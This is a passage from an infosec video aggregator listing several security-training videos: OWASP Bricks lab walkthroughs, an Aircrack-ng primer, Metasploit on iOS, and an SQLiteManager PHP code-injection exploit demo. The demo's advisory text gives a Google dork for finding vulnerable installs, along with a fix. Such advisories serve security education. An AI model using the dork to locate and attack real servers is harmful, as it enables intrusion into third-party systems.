    Description: Online documentation: OWASP Bricks File upload page #1 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Owasp Bricks - How To Solve The Second Challenge: File Upload Page #1
  21. Praetorian503
    Description: Online documentation: OWASP Bricks Login page #1 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Owasp Bricks - How To Solve The First Challenge: Log In Page #1
  22. Praetorian503
    Description: Online documentation: OWASP Bricks Installation Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Owasp Bricks Installation
  23. Praetorian503
    Description: Welcome to Part 6 of the Aircrack-ng Megaprimer! In this video, I will be discussing the tool, airdecap-ng. For more videos in the series and other great information security related videos, please visit: http:--www.securitytube.net As always, if you have any questions or feedback, you can leave them in the comments below, or you can reach me via e-mail at bennett@securitytube.net Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Aircrack-Ng Megaprimer Part 6: Airdecap-Ng
  24. Praetorian503
    Description: After i sent my exploit to exploit-db and 1337day, I made you this demo to show how it works. Links For The Exploit: http://www.exploit-db.com/exploits/24320/ 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team Tools used: HCON STF My Exploit Music: Infected Mushroom With Mayumana - Converting Vegetarian (Live) Exploit Description: ================================================== ============= Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability Google Dork: intitle:SQLiteManager inurl:sqlite/ Date: 23/01/2013 Exploit Author: RealGame Vendor Homepage: http://www.Relagame.co.il Software Link: SQLiteManager | Free Development software downloads at SourceForge.net Version: <=1.2.4 Tested on: Windows XP, Debian 2.6.32-46 CVE: N/A ================================================== ============= Vulnerable Softwares: Name: SQLiteManager Official Site: SQLiteManager - administration de bases de données SQLite. Name: Ampps Official Site: Softaculous AMPPS Name: VertrigoServ Official Site: VertrigoServ ================================================== ============= About Software: Official Site: SQLiteManager - administration de bases de données SQLite. SQLiteManager is a database manager for SQLite databases. You can manage any SQLite database created on any platform with SQLiteManager. ================================================== ============= Easy Way To Fix: Find: SQLiteStripSlashes($_POST['dbpath']) Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath'])) On File: ./include/add_database.php ================================================== ============= Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Sqlitemanager Remote Php Code Execution(Injection) Vulnerability - Demo
  25. Praetorian503
    Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Ipad For Security Professionals - Metasploit In Ios 6.1 By @Japtron
×
×
  • Create New...